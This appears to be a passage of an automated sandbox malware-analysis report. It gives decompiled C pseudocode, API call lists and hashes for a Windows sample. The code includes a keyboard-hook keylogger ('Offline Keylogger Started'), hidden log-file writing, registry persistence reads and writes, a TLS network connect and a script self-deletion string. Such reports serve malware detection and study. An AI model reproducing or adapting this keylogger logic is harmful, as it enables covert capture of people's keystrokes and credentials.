				signed char _t32;
				char* _t34;
				void* _t36;
				int _t40;
				void* _t42;
				void* _t46;
				void* _t58;
				int _t59;
				void* _t61;
				void* _t67;
				char* _t68;
				void* _t69;
				void* _t76;
				signed int _t129;
				signed int _t130;
				void* _t131;
				void* _t132;
				signed int _t133;

				_t120 = __edx;
				_t130 = _t129 & 0xfffffff8;
				_t133 = _t130;
				_t131 = _t130 - 0x464;
				_t76 = __ecx;
				_t125 = __ecx + 4;
				do {
					Sleep(0x2710); // executed
					E0040859A(_t76, _t120);
					_t120 = 0x45e65c;
					if(L00409AF8(_t133) != 0) {
						if(L00409A84() == 0) {
							CreateDirectoryW(L00401E4F(0x46b3a8), 0); // executed
						}
						_t122 = _t76 + 0x60;
						_t32 = GetFileAttributesW(L00401E4F(_t76 + 0x60)); // executed
						_t136 = _t32 & 0x00000002;
						if((_t32 & 0x00000002) != 0) {
							SetFileAttributesW(L00401E4F(_t122), 0x80); // executed
						}
						_t34 = L00401EF9(L00401DAD(0x46b558, _t120, _t136, 0x12));
						_t137 =  *_t34;
						if( *_t34 != 0) {
							E0040201F(_t76,  &_v1124);
							_t36 = E004023D3();
							L00405939( &_v1028, L00401EF9(0x46b540), _t36);
							_t40 = PathFileExistsW(L00401E4F(_t122));
							__eflags = _t40;
							if(_t40 != 0) {
								E0040201F(_t76,  &_v1100);
								_t58 = L00401E4F(_t122);
								_t120 =  &_v1100;
								_t59 = E0041735B(_t58,  &_v1100);
								__eflags = _t59;
								if(_t59 != 0) {
									_t61 = E004023D3();
									L00401F1B( &_v1136, _t120, _t125, L00405A61(_t76,  &_v1028,  &_v1100,  &_v1052, L00401EF9( &_v1100), _t61));
									L00401F11();
								}
								L00401F11();
							}
							E004050FE(_t125);
							_t42 = E004023D3();
							L00405A61(_t76,  &_v1032, _t120,  &_v1080, L00401EF9( &_v1128), _t42);
							_t46 = L00401E4F(_t122);
							_t132 = _t131 - 0x18;
							E00402036(_t76, _t132, _t120, __eflags,  &_v1092);
							E004173CD(_t46);
							_t131 = _t132 + 0x18;
							L00401F11();
							L00401F11();
						} else {
							_t67 = L00401E4F(_t122);
							_t68 = E004023D3();
							_t69 = L00401EF9(_t76 + 4);
							_t120 = _t68;
							E004172C6(_t69, _t68, _t67, 1); // executed
						}
						_t125 = _t76 + 4;
						L004058C8(_t76, _t76 + 4, 0x45e65c);
						if( *((char*)(L00401EF9(L00401DAD(0x46b558, _t120, _t137, 0x13)))) != 0) {
							SetFileAttributesW(L00401E4F(_t122), 6);
						}
					}
				} while ( *((char*)(_t76 + 0x48)) != 0);
				return 0;
			}

0x0040864b
0x0040864e
0x0040864e
0x00408651
0x00408658
0x0040865c
0x0040865f
0x00408664
0x0040866c
0x00408671
0x0040867f
0x00408691
0x004086a0
0x004086a0
0x004086a6
0x004086b1
0x004086b7
0x004086b9
0x004086c8
0x004086c8
0x004086dc
0x004086e1
0x004086e4
0x00408715
0x0040871f
0x00408734
0x00408741
0x00408747
0x00408749
0x0040874f
0x00408756
0x0040875b
0x00408761
0x00408766
0x00408768
0x0040876e
0x00408791
0x0040879a
0x0040879a
0x004087a3
0x004087a3
0x004087ad
0x004087b6
0x004087cf
0x004087d6
0x004087db
0x004087e7
0x004087ee
0x004087f3
0x004087fa
0x00408803
0x004086e6
0x004086ea
0x004086f2
0x004086fc
0x00408701
0x00408705
0x0040870b
0x00408808
0x00408812
0x0040882d
0x00408839
0x00408839
0x0040882d
0x0040883f
0x00408851

APIs

Sleep.KERNELBASE(00002710), ref: 00408664

Part of subcall function 0040859A: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408671), ref: 004085D0
Part of subcall function 0040859A: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408671), ref: 004085DF
Part of subcall function 0040859A: Sleep.KERNEL32(00002710,?,?,?,00408671), ref: 0040860C
Part of subcall function 0040859A: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,00408671), ref: 00408613

CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 004086A0
GetFileAttributesW.KERNELBASE(00000000), ref: 004086B1
SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 004086C8
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00408741

Part of subcall function 0041735B: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408766), ref: 00417378

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0045E65C), ref: 00408839

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
String ID:
API String ID: 110482706-0
Opcode ID: 127bfacff529eed587639040407aace1d200e51964f26c90b817af04aee492a7
Instruction ID: 651fa67ff222d8fdb0114ab1f297ff4912a9d425fa1d2aaf83a12709b340a586
Opcode Fuzzy Hash: 127bfacff529eed587639040407aace1d200e51964f26c90b817af04aee492a7
Instruction Fuzzy Hash: DE41BF7120430057CB09BB76D966AAF335A9FD0708F40043FB982B71E3EF7C99458A9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408215, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
threadCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00408215(void* __ecx, void* __eflags, char _a4) {
				void* __ebx;
				void* __edi;
				void* _t17;
				void* _t33;
				signed int _t35;
				signed int _t36;

				_t36 = _t35 & 0xfffffff8;
				_push(__ecx);
				_push(_t17);
				_t33 = __ecx;
				 *((char*)(__ecx + 0x48)) = 1;
				L00409A90(__ecx + 0x60,  &_a4);
				E004081EF(__ecx);
				_t41 =  *0x4699d0 - 0x32;
				_t29 = "Offline Keylogger Started";
				if( *0x4699d0 != 0x32) {
					_t36 = _t36 - 0x18;
					L00401FCE(_t17, _t36, "Offline Keylogger Started");
					L00408DFF(_t17, _t33, _t41);
				}
				_t37 = _t36 - 0x18;
				L00401FCE(_t17, _t36 - 0x18, _t29);
				L00401FCE(_t17, _t37 - 0x18, "[Info]");
				L00416673(_t17, _t29);
				CreateThread(0, 0, E0040830D, _t33, 0, 0); // executed
				if( *_t33 == 0) {
					CreateThread(0, 0, E004082F2, _t33, 0, 0); // executed
				}
				CreateThread(0, 0, E0040831C, _t33, 0, 0); // executed
				return L00401E54();
			}

0x00408218
0x0040821b
0x0040821c
0x0040821e
0x00408228
0x0040822c
0x00408233
0x00408238
0x0040823f
0x00408244
0x00408246
0x0040824c
0x00408253
0x00408253
0x00408258
0x0040825e
0x0040826d
0x00408272
0x0040828c
0x00408290
0x0040829c
0x0040829c
0x004082a8
0x004082b8

APIs

Part of subcall function 004081EF: GetKeyboardLayout.USER32 ref: 004081F4

CreateThread.KERNELBASE(00000000,00000000,0040830D,?,00000000,00000000), ref: 0040828C
CreateThread.KERNELBASE(00000000,00000000,Function_000082F2,?,00000000,00000000), ref: 0040829C
CreateThread.KERNELBASE(00000000,00000000,0040831C,?,00000000,00000000), ref: 004082A8

Part of subcall function 00408DFF: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00408E0D
Part of subcall function 00408DFF: SetEvent.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00408EB3

Strings

[Info], xrefs: 00408268
Offline Keylogger Started, xrefs: 0040823F, 0040824B, 0040825D

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateThread$EventKeyboardLayoutLocalTime
String ID: Offline Keylogger Started$[Info]
API String ID: 1520917520-3531117058
Opcode ID: fe8c0921b76bca1378d7a26478a2b6de6e8c79eb85a54edcaab9b1ebd9eaeb2b
Instruction ID: c50701be9bc26e9d0713e6751a675b7008b2abaa8d9f93c9ab07c5f4fb75a54f
Opcode Fuzzy Hash: fe8c0921b76bca1378d7a26478a2b6de6e8c79eb85a54edcaab9b1ebd9eaeb2b
Instruction Fuzzy Hash: F501C8A12006583AD61472368DC6DBF3A5CDB82798B04017FF885221D3DEB94D45D6FE

Uniqueness

Uniqueness Score: -1.00%

Function 004172C6, Relevance: 7.6, APIs: 5, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004172C6(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				void* _t12;
				int _t14;
				long _t16;
				long _t17;
				long _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t12 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21); // executed
				_t30 = _t12;
				if(_t30 != 0xffffffff) {
					if(_a8 != 1) {
						L10:
						_t14 = WriteFile(_t30, _v8, _t27,  &_v12, _t21); // executed
						if(_t14 != 0) {
							_t21 = 1;
						}
						FindCloseChangeNotification(_t30); // executed
						_t16 = _t21;
						goto L13;
					}
					_t17 = SetFilePointer(_t30, _t21, _t21, 2); // executed
					if(_t17 != 0xffffffff) {
						goto L10;
					}
					CloseHandle(_t30);
					goto L6;
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}

0x004172c9
0x004172ca
0x004172d0
0x004172d2
0x004172d6
0x004172d8
0x004172da
0x004172f2
0x004172f7
0x004172dc
0x004172df
0x004172e8
0x004172eb
0x004172e1
0x004172e3
0x004172e4
0x004172e4
0x004172df
0x00417305
0x0041730b
0x00417310
0x0041731a
0x00417335
0x0041733f
0x00417347
0x00417349
0x00417349
0x0041734c
0x00417352
0x00000000
0x00417352
0x00417321
0x0041732a
0x00000000
0x00000000
0x0041732d
0x00000000
0x00417312
0x00417312
0x00417312
0x00417354
0x0041735a
0x0041735a

APIs

CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00464A0C,00000000,00000000,?,0040B05C,00000000,00000000), ref: 00417305
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,0040B05C,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 00417321
CloseHandle.KERNEL32(00000000,?,0040B05C,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 0041732D
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000,?,0040B05C,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 0041733F
FindCloseChangeNotification.KERNELBASE(00000000,?,0040B05C,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName),00000000), ref: 0041734C

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
String ID:
API String ID: 1087594267-0
Opcode ID: 208603a4104985b557d5b2920daba598690c3bdd8bc1b5a0d3e68ce1df20cc00
Instruction ID: 576e1eb8d659bad8f9afa86eb7fbd3de2dfd073c35b582236a7a825f8aa23a7b
Opcode Fuzzy Hash: 208603a4104985b557d5b2920daba598690c3bdd8bc1b5a0d3e68ce1df20cc00
Instruction Fuzzy Hash: C211367120821CBFEB140F649D88EFB337CEB02361F104267FD25C6280C6B48D81A668

Uniqueness

Uniqueness Score: -1.00%

Function 0040859A, Relevance: 6.1, APIs: 4, Instructions: 58
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040859A(void* __ecx, void* __edx) {
				void* __ebx;
				signed int _t8;
				int _t9;
				long _t14;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t8 =  *0x46b3d8; // 0x989680
				_t9 = _t8 |  *0x46b3dc;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x3c)) = 0;
					do {
						_t9 = CreateFileW(L00401E4F(0x46b390), 0x80000000, 7, 0, 3, 0x80, 0); // executed
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x3c)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x46b3dc; // 0x0
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46b3d8)) {
								 *((char*)(_t24 + 0x3c)) = 1;
								if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
									L00408D8E();
								}
								Sleep(0x2710);
							}
							_t9 = FindCloseChangeNotification(_t23); // executed
						}
					} while ( *((char*)(_t24 + 0x3c)) == 1);
					if( *((intOrPtr*)(_t24 + 0x48)) == 0) {
						_t35 =  *0x4699d0 - 0x31;
						if( *0x4699d0 == 0x31) {
							L00406E88(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E00408215(_t24, _t35);
						}
					}
				}
				return _t9;
			}

0x0040859a
0x0040859a
0x0040859f
0x004085a8
0x004085aa
0x004085b2
0x004085b5
0x004085d0
0x004085d6
0x004085db
0x0040861b
0x004085dd
0x004085df
0x004085e5
0x004085eb
0x004085f7
0x004085fe
0x00408602
0x00408602
0x0040860c
0x0040860c
0x00408613
0x00408613
0x0040861e
0x00408627
0x00408629
0x00408630
0x0040863b
0x00000000
0x00408642
0x00408630
0x00408627
0x0040864a

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408671), ref: 004085D0
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408671), ref: 004085DF
Sleep.KERNEL32(00002710,?,?,?,00408671), ref: 0040860C
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,00408671), ref: 00408613

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationSizeSleep
String ID:
API String ID: 4068920109-0
Opcode ID: 6d547bf6523db021d45fd3dcd2f267830403a800327dca7f4f8f3bac04fa927b
Instruction ID: f835994df25df9efe04f70d5c38031f2491160577b46b782b0ad89114cb97067
Opcode Fuzzy Hash: 6d547bf6523db021d45fd3dcd2f267830403a800327dca7f4f8f3bac04fa927b
Instruction Fuzzy Hash: B711EE701003846ED72153259A9561F3B68B741754F45087FF4C1A37D2DFFAA8C4875E

Uniqueness

Uniqueness Score: -1.00%

Function 00408352, Relevance: 6.0, APIs: 4, Instructions: 40
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408352(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				struct HHOOK__* _t11;
				struct HHOOK__** _t14;

				_t14 = __ecx;
				 *0x46aaf0 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L2;
				} else {
					_t11 = SetWindowsHookExA(0xd, E0040833D, 0, 0); // executed
					 *_t14 = _t11;
					if(_t11 != 0) {
						L2:
						while(GetMessageA( &_v32, 0, 0, 0) != 0) {
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							if( *_t14 != 0) {
								continue;
							}
							goto L4;
						}
					}
				}
				L4:
				return 0;
			}

0x00408359
0x0040835e
0x00408366
0x00000000
0x00408368
0x00408371
0x00408377
0x0040837b
0x00000000
0x0040837d
0x00408392
0x0040839c
0x004083a4
0x00000000
0x00000000
0x00000000
0x004083a4
0x0040837d
0x0040837b
0x004083a7
0x004083ad

APIs

SetWindowsHookExA.USER32 ref: 00408371
GetMessageA.USER32 ref: 00408384
TranslateMessage.USER32(?), ref: 00408392
DispatchMessageA.USER32 ref: 0040839C

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Message$DispatchHookTranslateWindows
String ID:
API String ID: 1978648212-0
Opcode ID: 89d86fdb3fc6073db75f7ca0ee571670e5fbf3516a9641332bcd46a90cd240a4
Instruction ID: f75fd3838bce29abf5d839100c26d72f4f6316a8b55a23e19b72fa0baf0e3abd
Opcode Fuzzy Hash: 89d86fdb3fc6073db75f7ca0ee571670e5fbf3516a9641332bcd46a90cd240a4
Instruction Fuzzy Hash: E6F04931900306ABCB209FB59E09D577BBCEBD6B11700043FAC80E2151EBB8C441CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004048C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
networkCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004048C2(void* __edx, char _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t11;
				signed int _t14;
				void* _t15;
				void* _t19;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t24;
				void* _t30;
				char* _t31;
				void* _t32;

				_t21 = _t22;
				_t31 =  &_a4;
				_t2 = _t21 + 8; // 0x46b120
				_t11 = _t2;
				_t30 = _t11;
				_t3 = _t21 + 4; // 0xffffffff
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd"); // executed
				__imp__#4( *_t3, _t11, 0x10); // executed
				if(_t11 != 0) {
					L5:
					return 0;
				}
				if( *_t21 == _t11) {
					L9:
					return 1;
				}
				_t14 = L0041BDDC(_t21, _t22);
				 *(_t21 + 0x44) = _t14;
				if(_t14 == 0) {
					goto L5;
				}
				_t5 = _t21 + 4; // 0xffffffff
				_t29 =  *_t5;
				_t15 = L0041BE2A(_t14,  *_t5);
				_t6 = _t21 + 0x44; // 0x0
				_t24 =  *_t6;
				if(_t15 == 1) {
					if(L0041C8AB() == 1) {
						goto L9;
					}
					_t33 = _t32 - 0x18;
					L00401FCE(_t21, _t32 - 0x18, "TLS Authentication failed");
					L00401FCE(_t21, _t33 - 0x18, "[ERROR]");
					_t19 = L00416673(_t21, _t30);
					_t9 = _t21 + 0x44; // 0x0
					_t15 = L0041BFA5(_t19,  *_t9);
					_t10 = _t21 + 0x44; // 0x0
					_t24 =  *_t10;
				}
				L0041BE21(_t15, _t21, _t24, _t29, _t30, _t31);
				 *(_t21 + 0x44) =  *(_t21 + 0x44) & 0x00000000;
				goto L5;
			}

0x004048c9
0x004048cb
0x004048d0
0x004048d0
0x004048d3
0x004048d6
0x004048d9
0x004048da
0x004048db
0x004048dc
0x004048dd
0x004048e5
0x00404912
0x00000000
0x00404912
0x004048e9
0x00404959
0x00000000
0x00404959
0x004048eb
0x004048f0
0x004048f5
0x00000000
0x00000000
0x004048f7
0x004048f7
0x004048fc
0x00404901
0x00404901
0x00404907
0x00404924
0x00000000
0x00000000
0x00404926
0x00404930
0x0040493f
0x00404944
0x00404949
0x0040494f
0x00404954
0x00404954
0x00404954
0x00404909
0x0040490e
0x00000000

APIs

connect.WS2_32(FFFFFFFF,0046B120,00000010), ref: 004048DD

Strings

TLS Authentication failed, xrefs: 0040492B
[ERROR], xrefs: 0040493A

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: connect
String ID: TLS Authentication failed$[ERROR]
API String ID: 1959786783-1964023390
Opcode ID: c0969f01d02075a7281222aa74d6109fd6074985a98527ef33b2c77d84d185d8
Instruction ID: e1061a4a4e12699791ee0f93f7c3423602e9fc5613064c209d3bb85169b691bb
Opcode Fuzzy Hash: c0969f01d02075a7281222aa74d6109fd6074985a98527ef33b2c77d84d185d8
Instruction Fuzzy Hash: D301A9B120020096DF18BF76C9866B73B55DF82314B14007BEF059F297EA76C94597AA

Uniqueness

Uniqueness Score: -1.00%

Function 00410367, Relevance: 4.5, APIs: 3, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00410367(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = E004023D3();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, L00401EF9( &_a8), _t15); // executed
					RegCloseKey(_v8);
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				L00401F11();
				return _t20;
			}

0x0041036a
0x0041036b
0x00410376
0x0041037e
0x004103b7
0x00410380
0x00410384
0x0041039e
0x004103a9
0x004103b2
0x004103b2
0x004103bc
0x004103c7

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410376
RegSetValueExA.KERNELBASE(?,0045F640,00000000,?,00000000,00000000,0046B4F8,?,?,0040D329,0045F640,3.1.0 Pro), ref: 0041039E
RegCloseKey.ADVAPI32(?,?,?,0040D329,0045F640,3.1.0 Pro), ref: 004103A9

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 0605622619866d252f3858249e32883186aa33e64488a2b09e7ca13c5daa2311
Instruction ID: 0bf5570ed50c94a4f5a5198031eba54a0826f606d9efb5b763990b038eebb8db
Opcode Fuzzy Hash: 0605622619866d252f3858249e32883186aa33e64488a2b09e7ca13c5daa2311
Instruction Fuzzy Hash: 34F0F032000208FFCB009FA0ED05EEF372CEF05714F10816ABE05A61A2EB759E44DA98

Uniqueness

Uniqueness Score: -1.00%

Function 00410145, Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410145(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;
			}

0x0041014d
0x0041014e
0x00410151
0x00410165
0x0041016d
0x00000000
0x0041019c
0x00410183
0x0041018e
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410165
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046B4F8), ref: 00410183
RegCloseKey.KERNELBASE(?), ref: 0041018E

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: d4d56bba40c1f5cecf7ef9f11087ef87271ce5720a888dc508863279777ea07e
Instruction ID: b8cf7bccde8521342be8babf8189a42a41c4f815ba25e272f04cf645cd1985a2
Opcode Fuzzy Hash: d4d56bba40c1f5cecf7ef9f11087ef87271ce5720a888dc508863279777ea07e
Instruction Fuzzy Hash: CBF01D7690020CBFDF109FA09D05BEEBBBCEB05B11F1040A6BA04E6191D2759B94DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004101A2, Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E004101A2(void* __ecx, void* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				char _v1036;
				long _t11;
				void* _t19;
				void* _t23;

				_v12 = 0x400;
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_push(0x45e65c);
				} else {
					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
					RegCloseKey(_v8);
					_push( &_v1036);
				}
				L00401FCE(_t19, _t23);
				return _t23;
			}

0x004101af
0x004101c1
0x004101c4
0x004101cc
0x004101fb
0x004101ce
0x004101e3
0x004101ec
0x004101f8
0x004101f8
0x00410202
0x0041020d

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 004101C4
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004101E3
RegCloseKey.ADVAPI32(?), ref: 004101EC

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 433d59fc9d9f207e6ab5bd60472ae16326b1f2da351290277dfd4c78fd6847af
Instruction ID: 38d4959c826b0c095deef316bfe75dffb522e2904d01ad839de5223a5b3eb457
Opcode Fuzzy Hash: 433d59fc9d9f207e6ab5bd60472ae16326b1f2da351290277dfd4c78fd6847af
Instruction Fuzzy Hash: 42F0967564021CBBDB109B90DD45FDD7B7CEB04B01F1040A6BB05B6191D7B4AF859B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00445D3D, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00445D3D(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (L00445C83(_t19) - _t19 >> 1) + (L00445C83(_t19) - _t19 >> 1);
					_t6 = E0043E13D(_t14, (L00445C83(_t19) - _t19 >> 1) + (L00445C83(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						L00431B90(_t18, _t19, _t12);
					}
					L0043E9A5(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x00445d3d
0x00445d47
0x00445d4b
0x00445d5c
0x00445d60
0x00445d65
0x00445d6b
0x00445d70
0x00445d75
0x00445d7a
0x00445d81
0x00445d4d
0x00445d4d
0x00445d4d
0x00445d8c

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00445D41
_free.LIBCMT ref: 00445D7A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00445D81

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: a753751b67cf6d279ca3d435e31d9a259d0ce7152229039603d8c5bb7a9f02a8
Instruction ID: 8db2c58fd8947c051772db884218c214dc2a234030dee7552e202891e0060b13
Opcode Fuzzy Hash: a753751b67cf6d279ca3d435e31d9a259d0ce7152229039603d8c5bb7a9f02a8
Instruction Fuzzy Hash: 90E0E577501D106BF61122366C49D6F2618CFC67B6B15012BF51486143AE289C0201A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401616, Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00401616(signed int _a4, signed int _a8, char _a12) {
				intOrPtr _v16;
				char _v20;
				intOrPtr _v32;
				char _v36;
				char _v52;
				void* __esi;
				signed int _t21;
				signed int _t22;
				signed int _t24;
				intOrPtr _t40;
				signed int _t42;
				signed int _t43;
				signed int _t45;
				char* _t48;
				signed int _t53;
				char* _t55;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t63;
				void* _t64;
				void* _t67;
				void* _t68;

				_t61 = _t67;
				_t42 = _a4;
				if(_t42 != 0) {
					_t22 = _t21 | 0xffffffff;
					_t53 = _t22 % _a8;
					__eflags = _t22 / _a8 - _t42;
					if(_t22 / _a8 >= _t42) {
						_t43 = _t42 * _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							L8:
							_t24 = E0042E8D6(_t53, _t57, __eflags, _t43); // executed
							_t45 = _t24;
							goto L9;
						} else {
							__eflags = _t43 - 0x1000;
							if(__eflags < 0) {
								goto L8;
							} else {
								_t26 = _t43 + 0x23;
								__eflags = _t43 + 0x23 - _t43;
								if(__eflags <= 0) {
									goto L3;
								} else {
									_t40 = E0042E8D6(_t53, _t57, __eflags, _t26);
									_t11 = _t40 + 0x23; // 0x23
									_t45 = _t11 & 0xffffffe0;
									 *((intOrPtr*)(_t45 - 4)) = _t40;
									L9:
									return _t45;
								}
							}
						}
					} else {
						L3:
						_push(_t61);
						_t63 = _t67;
						_t68 = _t67 - 0xc;
						L0042EFED( &_v20);
						L0043170A( &_v20, 0x466c54);
						asm("int3");
						_push(_t63);
						_t64 = _t68;
						L0042F5E6( &_v36, _v16);
						L0043170A( &_v36, 0x466ce4);
						asm("int3");
						_push(_t64);
						_t48 =  &_v52;
						L0042F63D(_t48, _v32);
						L0043170A( &_v52, 0x466d20);
						asm("int3");
						_t55 = _t48;
						__eflags = 1;
